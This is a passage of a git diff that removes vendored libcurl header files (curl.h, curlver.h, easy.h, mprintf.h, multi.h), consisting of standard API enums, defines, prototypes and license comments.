-  CURLINFO_TOTAL_TIME       = CURLINFO_DOUBLE + 3,
-  CURLINFO_NAMELOOKUP_TIME  = CURLINFO_DOUBLE + 4,
-  CURLINFO_CONNECT_TIME     = CURLINFO_DOUBLE + 5,
-  CURLINFO_PRETRANSFER_TIME = CURLINFO_DOUBLE + 6,
-  CURLINFO_SIZE_UPLOAD      = CURLINFO_DOUBLE + 7,
-  CURLINFO_SIZE_UPLOAD_T    = CURLINFO_OFF_T  + 7,
-  CURLINFO_SIZE_DOWNLOAD    = CURLINFO_DOUBLE + 8,
-  CURLINFO_SIZE_DOWNLOAD_T  = CURLINFO_OFF_T  + 8,
-  CURLINFO_SPEED_DOWNLOAD   = CURLINFO_DOUBLE + 9,
-  CURLINFO_SPEED_DOWNLOAD_T = CURLINFO_OFF_T  + 9,
-  CURLINFO_SPEED_UPLOAD     = CURLINFO_DOUBLE + 10,
-  CURLINFO_SPEED_UPLOAD_T   = CURLINFO_OFF_T  + 10,
-  CURLINFO_HEADER_SIZE      = CURLINFO_LONG   + 11,
-  CURLINFO_REQUEST_SIZE     = CURLINFO_LONG   + 12,
-  CURLINFO_SSL_VERIFYRESULT = CURLINFO_LONG   + 13,
-  CURLINFO_FILETIME         = CURLINFO_LONG   + 14,
-  CURLINFO_FILETIME_T       = CURLINFO_OFF_T  + 14,
-  CURLINFO_CONTENT_LENGTH_DOWNLOAD   = CURLINFO_DOUBLE + 15,
-  CURLINFO_CONTENT_LENGTH_DOWNLOAD_T = CURLINFO_OFF_T  + 15,
-  CURLINFO_CONTENT_LENGTH_UPLOAD     = CURLINFO_DOUBLE + 16,
-  CURLINFO_CONTENT_LENGTH_UPLOAD_T   = CURLINFO_OFF_T  + 16,
-  CURLINFO_STARTTRANSFER_TIME = CURLINFO_DOUBLE + 17,
-  CURLINFO_CONTENT_TYPE     = CURLINFO_STRING + 18,
-  CURLINFO_REDIRECT_TIME    = CURLINFO_DOUBLE + 19,
-  CURLINFO_REDIRECT_COUNT   = CURLINFO_LONG   + 20,
-  CURLINFO_PRIVATE          = CURLINFO_STRING + 21,
-  CURLINFO_HTTP_CONNECTCODE = CURLINFO_LONG   + 22,
-  CURLINFO_HTTPAUTH_AVAIL   = CURLINFO_LONG   + 23,
-  CURLINFO_PROXYAUTH_AVAIL  = CURLINFO_LONG   + 24,
-  CURLINFO_OS_ERRNO         = CURLINFO_LONG   + 25,
-  CURLINFO_NUM_CONNECTS     = CURLINFO_LONG   + 26,
-  CURLINFO_SSL_ENGINES      = CURLINFO_SLIST  + 27,
-  CURLINFO_COOKIELIST       = CURLINFO_SLIST  + 28,
-  CURLINFO_LASTSOCKET       = CURLINFO_LONG   + 29,
-  CURLINFO_FTP_ENTRY_PATH   = CURLINFO_STRING + 30,
-  CURLINFO_REDIRECT_URL     = CURLINFO_STRING + 31,
-  CURLINFO_PRIMARY_IP       = CURLINFO_STRING + 32,
-  CURLINFO_APPCONNECT_TIME  = CURLINFO_DOUBLE + 33,
-  CURLINFO_CERTINFO         = CURLINFO_PTR    + 34,
-  CURLINFO_CONDITION_UNMET  = CURLINFO_LONG   + 35,
-  CURLINFO_RTSP_SESSION_ID  = CURLINFO_STRING + 36,
-  CURLINFO_RTSP_CLIENT_CSEQ = CURLINFO_LONG   + 37,
-  CURLINFO_RTSP_SERVER_CSEQ = CURLINFO_LONG   + 38,
-  CURLINFO_RTSP_CSEQ_RECV   = CURLINFO_LONG   + 39,
-  CURLINFO_PRIMARY_PORT     = CURLINFO_LONG   + 40,
-  CURLINFO_LOCAL_IP         = CURLINFO_STRING + 41,
-  CURLINFO_LOCAL_PORT       = CURLINFO_LONG   + 42,
-  CURLINFO_TLS_SESSION      = CURLINFO_PTR    + 43,
-  CURLINFO_ACTIVESOCKET     = CURLINFO_SOCKET + 44,
-  CURLINFO_TLS_SSL_PTR      = CURLINFO_PTR    + 45,
-  CURLINFO_HTTP_VERSION     = CURLINFO_LONG   + 46,
-  CURLINFO_PROXY_SSL_VERIFYRESULT = CURLINFO_LONG + 47,
-  CURLINFO_PROTOCOL         = CURLINFO_LONG   + 48,
-  CURLINFO_SCHEME           = CURLINFO_STRING + 49,
-  /* Fill in new entries below here! */
-
-  CURLINFO_LASTONE          = 49
-} CURLINFO;
-
-/* CURLINFO_RESPONSE_CODE is the new name for the option previously known as
-   CURLINFO_HTTP_CODE */
-#define CURLINFO_HTTP_CODE CURLINFO_RESPONSE_CODE
-
-typedef enum {
-  CURLCLOSEPOLICY_NONE, /* first, never use this */
-
-  CURLCLOSEPOLICY_OLDEST,
-  CURLCLOSEPOLICY_LEAST_RECENTLY_USED,
-  CURLCLOSEPOLICY_LEAST_TRAFFIC,
-  CURLCLOSEPOLICY_SLOWEST,
-  CURLCLOSEPOLICY_CALLBACK,
-
-  CURLCLOSEPOLICY_LAST /* last, never use this */
-} curl_closepolicy;
-
-#define CURL_GLOBAL_SSL (1<<0) /* no purpose since since 7.57.0 */
-#define CURL_GLOBAL_WIN32 (1<<1)
-#define CURL_GLOBAL_ALL (CURL_GLOBAL_SSL|CURL_GLOBAL_WIN32)
-#define CURL_GLOBAL_NOTHING 0
-#define CURL_GLOBAL_DEFAULT CURL_GLOBAL_ALL
-#define CURL_GLOBAL_ACK_EINTR (1<<2)
-
-
-/*****************************************************************************
- * Setup defines, protos etc for the sharing stuff.
- */
-
-/* Different data locks for a single share */
-typedef enum {
-  CURL_LOCK_DATA_NONE = 0,
-  /*  CURL_LOCK_DATA_SHARE is used internally to say that
-   *  the locking is just made to change the internal state of the share
-   *  itself.
-   */
-  CURL_LOCK_DATA_SHARE,
-  CURL_LOCK_DATA_COOKIE,
-  CURL_LOCK_DATA_DNS,
-  CURL_LOCK_DATA_SSL_SESSION,
-  CURL_LOCK_DATA_CONNECT,
-  CURL_LOCK_DATA_LAST
-} curl_lock_data;
-
-/* Different lock access types */
-typedef enum {
-  CURL_LOCK_ACCESS_NONE = 0,   /* unspecified action */
-  CURL_LOCK_ACCESS_SHARED = 1, /* for read perhaps */
-  CURL_LOCK_ACCESS_SINGLE = 2, /* for write perhaps */
-  CURL_LOCK_ACCESS_LAST        /* never use */
-} curl_lock_access;
-
-typedef void (*curl_lock_function)(CURL *handle,
-                                   curl_lock_data data,
-                                   curl_lock_access locktype,
-                                   void *userptr);
-typedef void (*curl_unlock_function)(CURL *handle,
-                                     curl_lock_data data,
-                                     void *userptr);
-
-
-typedef enum {
-  CURLSHE_OK,  /* all is fine */
-  CURLSHE_BAD_OPTION, /* 1 */
-  CURLSHE_IN_USE,     /* 2 */
-  CURLSHE_INVALID,    /* 3 */
-  CURLSHE_NOMEM,      /* 4 out of memory */
-  CURLSHE_NOT_BUILT_IN, /* 5 feature not present in lib */
-  CURLSHE_LAST        /* never use */
-} CURLSHcode;
-
-typedef enum {
-  CURLSHOPT_NONE,  /* don't use */
-  CURLSHOPT_SHARE,   /* specify a data type to share */
-  CURLSHOPT_UNSHARE, /* specify which data type to stop sharing */
-  CURLSHOPT_LOCKFUNC,   /* pass in a 'curl_lock_function' pointer */
-  CURLSHOPT_UNLOCKFUNC, /* pass in a 'curl_unlock_function' pointer */
-  CURLSHOPT_USERDATA,   /* pass in a user data pointer used in the lock/unlock
-                           callback functions */
-  CURLSHOPT_LAST  /* never use */
-} CURLSHoption;
-
-CURL_EXTERN CURLSH *curl_share_init(void);
-CURL_EXTERN CURLSHcode curl_share_setopt(CURLSH *, CURLSHoption option, ...);
-CURL_EXTERN CURLSHcode curl_share_cleanup(CURLSH *);
-
-/****************************************************************************
- * Structures for querying information about the curl library at runtime.
- */
-
-typedef enum {
-  CURLVERSION_FIRST,
-  CURLVERSION_SECOND,
-  CURLVERSION_THIRD,
-  CURLVERSION_FOURTH,
-  CURLVERSION_FIFTH,
-  CURLVERSION_LAST /* never actually use this */
-} CURLversion;
-
-/* The 'CURLVERSION_NOW' is the symbolic name meant to be used by
-   basically all programs ever that want to get version information. It is
-   meant to be a built-in version number for what kind of struct the caller
-   expects. If the struct ever changes, we redefine the NOW to another enum
-   from above. */
-#define CURLVERSION_NOW CURLVERSION_FIFTH
-
-typedef struct {
-  CURLversion age;          /* age of the returned struct */
-  const char *version;      /* LIBCURL_VERSION */
-  unsigned int version_num; /* LIBCURL_VERSION_NUM */
-  const char *host;         /* OS/host/cpu/machine when configured */
-  int features;             /* bitmask, see defines below */
-  const char *ssl_version;  /* human readable string */
-  long ssl_version_num;     /* not used anymore, always 0 */
-  const char *libz_version; /* human readable string */
-  /* protocols is terminated by an entry with a NULL protoname */
-  const char * const *protocols;
-
-  /* The fields below this were added in CURLVERSION_SECOND */
-  const char *ares;
-  int ares_num;
-
-  /* This field was added in CURLVERSION_THIRD */
-  const char *libidn;
-
-  /* These field were added in CURLVERSION_FOURTH */
-
-  /* Same as '_libiconv_version' if built with HAVE_ICONV */
-  int iconv_ver_num;
-
-  const char *libssh_version; /* human readable string */
-
-  /* These fields were added in CURLVERSION_FIFTH */
-
-  unsigned int brotli_ver_num; /* Numeric Brotli version
-                                  (MAJOR << 24) | (MINOR << 12) | PATCH */
-  const char *brotli_version; /* human readable string. */
-
-} curl_version_info_data;
-
-#define CURL_VERSION_IPV6         (1<<0)  /* IPv6-enabled */
-#define CURL_VERSION_KERBEROS4    (1<<1)  /* Kerberos V4 auth is supported
-                                             (deprecated) */
-#define CURL_VERSION_SSL          (1<<2)  /* SSL options are present */
-#define CURL_VERSION_LIBZ         (1<<3)  /* libz features are present */
-#define CURL_VERSION_NTLM         (1<<4)  /* NTLM auth is supported */
-#define CURL_VERSION_GSSNEGOTIATE (1<<5)  /* Negotiate auth is supported
-                                             (deprecated) */
-#define CURL_VERSION_DEBUG        (1<<6)  /* Built with debug capabilities */
-#define CURL_VERSION_ASYNCHDNS    (1<<7)  /* Asynchronous DNS resolves */
-#define CURL_VERSION_SPNEGO       (1<<8)  /* SPNEGO auth is supported */
-#define CURL_VERSION_LARGEFILE    (1<<9)  /* Supports files larger than 2GB */
-#define CURL_VERSION_IDN          (1<<10) /* Internationized Domain Names are
-                                             supported */
-#define CURL_VERSION_SSPI         (1<<11) /* Built against Windows SSPI */
-#define CURL_VERSION_CONV         (1<<12) /* Character conversions supported */
-#define CURL_VERSION_CURLDEBUG    (1<<13) /* Debug memory tracking supported */
-#define CURL_VERSION_TLSAUTH_SRP  (1<<14) /* TLS-SRP auth is supported */
-#define CURL_VERSION_NTLM_WB      (1<<15) /* NTLM delegation to winbind helper
-                                             is supported */
-#define CURL_VERSION_HTTP2        (1<<16) /* HTTP2 support built-in */
-#define CURL_VERSION_GSSAPI       (1<<17) /* Built against a GSS-API library */
-#define CURL_VERSION_KERBEROS5    (1<<18) /* Kerberos V5 auth is supported */
-#define CURL_VERSION_UNIX_SOCKETS (1<<19) /* Unix domain sockets support */
-#define CURL_VERSION_PSL          (1<<20) /* Mozilla's Public Suffix List, used
-                                             for cookie domain verification */
-#define CURL_VERSION_HTTPS_PROXY  (1<<21) /* HTTPS-proxy support built-in */
-#define CURL_VERSION_MULTI_SSL    (1<<22) /* Multiple SSL backends available */
-#define CURL_VERSION_BROTLI       (1<<23) /* Brotli features are present. */
-
- /*
- * NAME curl_version_info()
- *
- * DESCRIPTION
- *
- * This function returns a pointer to a static copy of the version info
- * struct. See above.
- */
-CURL_EXTERN curl_version_info_data *curl_version_info(CURLversion);
-
-/*
- * NAME curl_easy_strerror()
- *
- * DESCRIPTION
- *
- * The curl_easy_strerror function may be used to turn a CURLcode value
- * into the equivalent human readable error string.  This is useful
- * for printing meaningful error messages.
- */
-CURL_EXTERN const char *curl_easy_strerror(CURLcode);
-
-/*
- * NAME curl_share_strerror()
- *
- * DESCRIPTION
- *
- * The curl_share_strerror function may be used to turn a CURLSHcode value
- * into the equivalent human readable error string.  This is useful
- * for printing meaningful error messages.
- */
-CURL_EXTERN const char *curl_share_strerror(CURLSHcode);
-
-/*
- * NAME curl_easy_pause()
- *
- * DESCRIPTION
- *
- * The curl_easy_pause function pauses or unpauses transfers. Select the new
- * state by setting the bitmask, use the convenience defines below.
- *
- */
-CURL_EXTERN CURLcode curl_easy_pause(CURL *handle, int bitmask);
-
-#define CURLPAUSE_RECV      (1<<0)
-#define CURLPAUSE_RECV_CONT (0)
-
-#define CURLPAUSE_SEND      (1<<2)
-#define CURLPAUSE_SEND_CONT (0)
-
-#define CURLPAUSE_ALL       (CURLPAUSE_RECV|CURLPAUSE_SEND)
-#define CURLPAUSE_CONT      (CURLPAUSE_RECV_CONT|CURLPAUSE_SEND_CONT)
-
-#ifdef  __cplusplus
-}
-#endif
-
-/* unfortunately, the easy.h and multi.h include files need options and info
-  stuff before they can be included! */
-#include "easy.h" /* nothing in curl is fun without the easy stuff */
-#include "multi.h"
-
-/* the typechecker doesn't work in C++ (yet) */
-#if defined(__GNUC__) && defined(__GNUC_MINOR__) && \
-    ((__GNUC__ > 4) || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) && \
-    !defined(__cplusplus) && !defined(CURL_DISABLE_TYPECHECK)
-#include "typecheck-gcc.h"
-#else
-#if defined(__STDC__) && (__STDC__ >= 1)
-/* This preprocessor magic that replaces a call with the exact same call is
-   only done to make sure application authors pass exactly three arguments
-   to these functions. */
-#define curl_easy_setopt(handle,opt,param) curl_easy_setopt(handle,opt,param)
-#define curl_easy_getinfo(handle,info,arg) curl_easy_getinfo(handle,info,arg)
-#define curl_share_setopt(share,opt,param) curl_share_setopt(share,opt,param)
-#define curl_multi_setopt(handle,opt,param) curl_multi_setopt(handle,opt,param)
-#endif /* __STDC__ >= 1 */
-#endif /* gcc >= 4.3 && !__cplusplus */
-
-#endif /* __CURL_CURL_H */
diff --git a/thirdparty/curl/include/curl/curlver.h b/thirdparty/curl/include/curl/curlver.h
deleted file mode 100644
index 5149d2f..0000000
--- a/thirdparty/curl/include/curl/curlver.h
+++ /dev/null
@@ -1,77 +0,0 @@
-#ifndef __CURL_CURLVER_H
-#define __CURL_CURLVER_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2018, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-
-/* This header file contains nothing but libcurl version info, generated by
-   a script at release-time. This was made its own header file in 7.11.2 */
-
-/* This is the global package copyright */
-#define LIBCURL_COPYRIGHT "1996 - 2018 Daniel Stenberg, <daniel@haxx.se>."
-
-/* This is the version number of the libcurl package from which this header
-   file origins: */
-#define LIBCURL_VERSION "7.59.0-DEV"
-
-/* The numeric version number is also available "in parts" by using these
-   defines: */
-#define LIBCURL_VERSION_MAJOR 7
-#define LIBCURL_VERSION_MINOR 59
-#define LIBCURL_VERSION_PATCH 0
-
-/* This is the numeric version of the libcurl version number, meant for easier
-   parsing and comparions by programs. The LIBCURL_VERSION_NUM define will
-   always follow this syntax:
-
-         0xXXYYZZ
-
-   Where XX, YY and ZZ are the main version, release and patch numbers in
-   hexadecimal (using 8 bits each). All three numbers are always represented
-   using two digits.  1.2 would appear as "0x010200" while version 9.11.7
-   appears as "0x090b07".
-
-   This 6-digit (24 bits) hexadecimal number does not show pre-release number,
-   and it is always a greater number in a more recent release. It makes
-   comparisons with greater than and less than work.
-
-   Note: This define is the full hex number and _does not_ use the
-   CURL_VERSION_BITS() macro since curl's own configure script greps for it
-   and needs it to contain the full number.
-*/
-#define LIBCURL_VERSION_NUM 0x073B00
-
-/*
- * This is the date and time when the full source package was created. The
- * timestamp is not stored in git, as the timestamp is properly set in the
- * tarballs by the maketgz script.
- *
- * The format of the date follows this template:
- *
- * "2007-11-23"
- */
-#define LIBCURL_TIMESTAMP "[unreleased]"
-
-#define CURL_VERSION_BITS(x,y,z) ((x)<<16|(y)<<8|z)
-#define CURL_AT_LEAST_VERSION(x,y,z) \
-  (LIBCURL_VERSION_NUM >= CURL_VERSION_BITS(x, y, z))
-
-#endif /* __CURL_CURLVER_H */
diff --git a/thirdparty/curl/include/curl/easy.h b/thirdparty/curl/include/curl/easy.h
deleted file mode 100644
index 752c504..0000000
--- a/thirdparty/curl/include/curl/easy.h
+++ /dev/null
@@ -1,102 +0,0 @@
-#ifndef __CURL_EASY_H
-#define __CURL_EASY_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2016, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-CURL_EXTERN CURL *curl_easy_init(void);
-CURL_EXTERN CURLcode curl_easy_setopt(CURL *curl, CURLoption option, ...);
-CURL_EXTERN CURLcode curl_easy_perform(CURL *curl);
-CURL_EXTERN void curl_easy_cleanup(CURL *curl);
-
-/*
- * NAME curl_easy_getinfo()
- *
- * DESCRIPTION
- *
- * Request internal information from the curl session with this function.  The
- * third argument MUST be a pointer to a long, a pointer to a char * or a
- * pointer to a double (as the documentation describes elsewhere).  The data
- * pointed to will be filled in accordingly and can be relied upon only if the
- * function returns CURLE_OK.  This function is intended to get used *AFTER* a
- * performed transfer, all results from this function are undefined until the
- * transfer is completed.
- */
-CURL_EXTERN CURLcode curl_easy_getinfo(CURL *curl, CURLINFO info, ...);
-
-
-/*
- * NAME curl_easy_duphandle()
- *
- * DESCRIPTION
- *
- * Creates a new curl session handle with the same options set for the handle
- * passed in. Duplicating a handle could only be a matter of cloning data and
- * options, internal state info and things like persistent connections cannot
- * be transferred. It is useful in multithreaded applications when you can run
- * curl_easy_duphandle() for each new thread to avoid a series of identical
- * curl_easy_setopt() invokes in every thread.
- */
-CURL_EXTERN CURL *curl_easy_duphandle(CURL *curl);
-
-/*
- * NAME curl_easy_reset()
- *
- * DESCRIPTION
- *
- * Re-initializes a CURL handle to the default values. This puts back the
- * handle to the same state as it was in when it was just created.
- *
- * It does keep: live connections, the Session ID cache, the DNS cache and the
- * cookies.
- */
-CURL_EXTERN void curl_easy_reset(CURL *curl);
-
-/*
- * NAME curl_easy_recv()
- *
- * DESCRIPTION
- *
- * Receives data from the connected socket. Use after successful
- * curl_easy_perform() with CURLOPT_CONNECT_ONLY option.
- */
-CURL_EXTERN CURLcode curl_easy_recv(CURL *curl, void *buffer, size_t buflen,
-                                    size_t *n);
-
-/*
- * NAME curl_easy_send()
- *
- * DESCRIPTION
- *
- * Sends data over the connected socket. Use after successful
- * curl_easy_perform() with CURLOPT_CONNECT_ONLY option.
- */
-CURL_EXTERN CURLcode curl_easy_send(CURL *curl, const void *buffer,
-                                    size_t buflen, size_t *n);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/curl/include/curl/mprintf.h b/thirdparty/curl/include/curl/mprintf.h
deleted file mode 100644
index e20f546..0000000
--- a/thirdparty/curl/include/curl/mprintf.h
+++ /dev/null
@@ -1,50 +0,0 @@
-#ifndef __CURL_MPRINTF_H
-#define __CURL_MPRINTF_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2016, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-
-#include <stdarg.h>
-#include <stdio.h> /* needed for FILE */
-#include "curl.h"  /* for CURL_EXTERN */
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-CURL_EXTERN int curl_mprintf(const char *format, ...);
-CURL_EXTERN int curl_mfprintf(FILE *fd, const char *format, ...);
-CURL_EXTERN int curl_msprintf(char *buffer, const char *format, ...);
-CURL_EXTERN int curl_msnprintf(char *buffer, size_t maxlength,
-                               const char *format, ...);
-CURL_EXTERN int curl_mvprintf(const char *format, va_list args);
-CURL_EXTERN int curl_mvfprintf(FILE *fd, const char *format, va_list args);
-CURL_EXTERN int curl_mvsprintf(char *buffer, const char *format, va_list args);
-CURL_EXTERN int curl_mvsnprintf(char *buffer, size_t maxlength,
-                                const char *format, va_list args);
-CURL_EXTERN char *curl_maprintf(const char *format, ...);
-CURL_EXTERN char *curl_mvaprintf(const char *format, va_list args);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif /* __CURL_MPRINTF_H */
diff --git a/thirdparty/curl/include/curl/multi.h b/thirdparty/curl/include/curl/multi.h
deleted file mode 100644
index b19dbaf..0000000
--- a/thirdparty/curl/include/curl/multi.h
+++ /dev/null
@@ -1,441 +0,0 @@
-#ifndef __CURL_MULTI_H
-#define __CURL_MULTI_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2017, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-/*
-  This is an "external" header file. Don't give away any internals here!
-
-  GOALS
-
-  o Enable a "pull" interface. The application that uses libcurl decides where
-    and when to ask libcurl to get/send data.
-
-  o Enable multiple simultaneous transfers in the same thread without making it
-    complicated for the application.
-
-  o Enable the application to select() on its own file descriptors and curl's
-    file descriptors simultaneous easily.
-
-*/
-
-/*
- * This header file should not really need to include "curl.h" since curl.h
- * itself includes this file and we expect user applications to do #include
- * <curl/curl.h> without the need for especially including multi.h.
- *
- * For some reason we added this include here at one point, and rather than to
- * break existing (wrongly written) libcurl applications, we leave it as-is
- * but with this warning attached.
- */
-#include "curl.h"
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#if defined(BUILDING_LIBCURL) || defined(CURL_STRICTER)
-typedef struct Curl_multi CURLM;
-#else
-typedef void CURLM;
-#endif
-
-typedef enum {
-  CURLM_CALL_MULTI_PERFORM = -1, /* please call curl_multi_perform() or
-                                    curl_multi_socket*() soon */
-  CURLM_OK,
-  CURLM_BAD_HANDLE,      /* the passed-in handle is not a valid CURLM handle */
-  CURLM_BAD_EASY_HANDLE, /* an easy handle was not good/valid */
-  CURLM_OUT_OF_MEMORY,   /* if you ever get this, you're in deep sh*t */
-  CURLM_INTERNAL_ERROR,  /* this is a libcurl bug */
-  CURLM_BAD_SOCKET,      /* the passed in socket argument did not match */
-  CURLM_UNKNOWN_OPTION,  /* curl_multi_setopt() with unsupported option */
-  CURLM_ADDED_ALREADY,   /* an easy handle already added to a multi handle was
-                            attempted to get added - again */
-  CURLM_RECURSIVE_API_CALL, /* an api function was called from inside a
-                               callback */
-  CURLM_LAST
-} CURLMcode;
-
-/* just to make code nicer when using curl_multi_socket() you can now check
-   for CURLM_CALL_MULTI_SOCKET too in the same style it works for
-   curl_multi_perform() and CURLM_CALL_MULTI_PERFORM */
-#define CURLM_CALL_MULTI_SOCKET CURLM_CALL_MULTI_PERFORM
-
-/* bitmask bits for CURLMOPT_PIPELINING */
-#define CURLPIPE_NOTHING   0L
-#define CURLPIPE_HTTP1     1L
-#define CURLPIPE_MULTIPLEX 2L
-
-typedef enum {
-  CURLMSG_NONE, /* first, not used */
-  CURLMSG_DONE, /* This easy handle has completed. 'result' contains
-                   the CURLcode of the transfer */
-  CURLMSG_LAST /* last, not used */
-} CURLMSG;
-
-struct CURLMsg {
-  CURLMSG msg;       /* what this message means */
-  CURL *easy_handle; /* the handle it concerns */
-  union {
-    void *whatever;    /* message-specific data */
-    CURLcode result;   /* return code for transfer */
-  } data;
-};
-typedef struct CURLMsg CURLMsg;
-
-/* Based on poll(2) structure and values.
- * We don't use pollfd and POLL* constants explicitly
- * to cover platforms without poll(). */
-#define CURL_WAIT_POLLIN    0x0001
-#define CURL_WAIT_POLLPRI   0x0002
-#define CURL_WAIT_POLLOUT   0x0004
-
-struct curl_waitfd {
-  curl_socket_t fd;
-  short events;
-  short revents; /* not supported yet */
-};
-
-/*
- * Name:    curl_multi_init()
- *
- * Desc:    inititalize multi-style curl usage
- *
- * Returns: a new CURLM handle to use in all 'curl_multi' functions.
- */
-CURL_EXTERN CURLM *curl_multi_init(void);
-
-/*
- * Name:    curl_multi_add_handle()
- *
- * Desc:    add a standard curl handle to the multi stack
- *
- * Returns: CURLMcode type, general multi error code.
- */
-CURL_EXTERN CURLMcode curl_multi_add_handle(CURLM *multi_handle,
-                                            CURL *curl_handle);
-
- /*
-  * Name:    curl_multi_remove_handle()
-  *
-  * Desc:    removes a curl handle from the multi stack again
-  *
-  * Returns: CURLMcode type, general multi error code.
-  */
-CURL_EXTERN CURLMcode curl_multi_remove_handle(CURLM *multi_handle,
-                                               CURL *curl_handle);
-
- /*
-  * Name:    curl_multi_fdset()
-  *
-  * Desc:    Ask curl for its fd_set sets. The app can use these to select() or
-  *          poll() on. We want curl_multi_perform() called as soon as one of
-  *          them are ready.
-  *
-  * Returns: CURLMcode type, general multi error code.
-  */
-CURL_EXTERN CURLMcode curl_multi_fdset(CURLM *multi_handle,
-                                       fd_set *read_fd_set,
-                                       fd_set *write_fd_set,
-                                       fd_set *exc_fd_set,
-                                       int *max_fd);
-
-/*
- * Name:     curl_multi_wait()
- *
- * Desc:     Poll on all fds within a CURLM set as well as any
- *           additional fds passed to the function.
- *
- * Returns:  CURLMcode type, general multi error code.
- */
-CURL_EXTERN CURLMcode curl_multi_wait(CURLM *multi_handle,
-                                      struct curl_waitfd extra_fds[],
-                                      unsigned int extra_nfds,
-                                      int timeout_ms,
-                                      int *ret);
-
- /*
-  * Name:    curl_multi_perform()
-  *
-  * Desc:    When the app thinks there's data available for curl it calls this
-  *          function to read/write whatever there is right now. This returns
-  *          as soon as the reads and writes are done. This function does not
-  *          require that there actually is data available for reading or that
-  *          data can be written, it can be called just in case. It returns
-  *          the number of handles that still transfer data in the second
-  *          argument's integer-pointer.
-  *
-  * Returns: CURLMcode type, general multi error code. *NOTE* that this only
-  *          returns errors etc regarding the whole multi stack. There might
-  *          still have occurred problems on individual transfers even when
-  *          this returns OK.
-  */
-CURL_EXTERN CURLMcode curl_multi_perform(CURLM *multi_handle,
-                                         int *running_handles);
-
- /*
-  * Name:    curl_multi_cleanup()
-  *
-  * Desc:    Cleans up and removes a whole multi stack. It does not free or
-  *          touch any individual easy handles in any way. We need to define
-  *          in what state those handles will be if this function is called
-  *          in the middle of a transfer.
-  *
-  * Returns: CURLMcode type, general multi error code.
-  */
-CURL_EXTERN CURLMcode curl_multi_cleanup(CURLM *multi_handle);
-
-/*
- * Name:    curl_multi_info_read()
- *
- * Desc:    Ask the multi handle if there's any messages/informationals from
- *          the individual transfers. Messages include informationals such as
- *          error code from the transfer or just the fact that a transfer is
- *          completed. More details on these should be written down as well.
- *
- *          Repeated calls to this function will return a new struct each
- *          time, until a special "end of msgs" struct is returned as a signal
- *          that there is no more to get at this point.
- *
- *          The data the returned pointer points to will not survive calling
- *          curl_multi_cleanup().
- *
- *          The 'CURLMsg' struct is meant to be very simple and only contain
- *          very basic information. If more involved information is wanted,
- *          we will provide the particular "transfer handle" in that struct
- *          and that should/could/would be used in subsequent
- *          curl_easy_getinfo() calls (or similar). The point being that we
- *          must never expose complex structs to applications, as then we'll
- *          undoubtably get backwards compatibility problems in the future.
- *
- * Returns: A pointer to a filled-in struct, or NULL if it failed or ran out
- *          of structs. It also writes the number of messages left in the
- *          queue (after this read) in the integer the second argument points
- *          to.
- */
-CURL_EXTERN CURLMsg *curl_multi_info_read(CURLM *multi_handle,
-                                          int *msgs_in_queue);
-
-/*
- * Name:    curl_multi_strerror()
- *
- * Desc:    The curl_multi_strerror function may be used to turn a CURLMcode
- *          value into the equivalent human readable error string.  This is
- *          useful for printing meaningful error messages.
- *
- * Returns: A pointer to a zero-terminated error message.
- */
-CURL_EXTERN const char *curl_multi_strerror(CURLMcode);
-
-/*
- * Name:    curl_multi_socket() and
- *          curl_multi_socket_all()
- *
- * Desc:    An alternative version of curl_multi_perform() that allows the
- *          application to pass in one of the file descriptors that have been
- *          detected to have "action" on them and let libcurl perform.
- *          See man page for details.
- */
-#define CURL_POLL_NONE   0
-#define CURL_POLL_IN     1
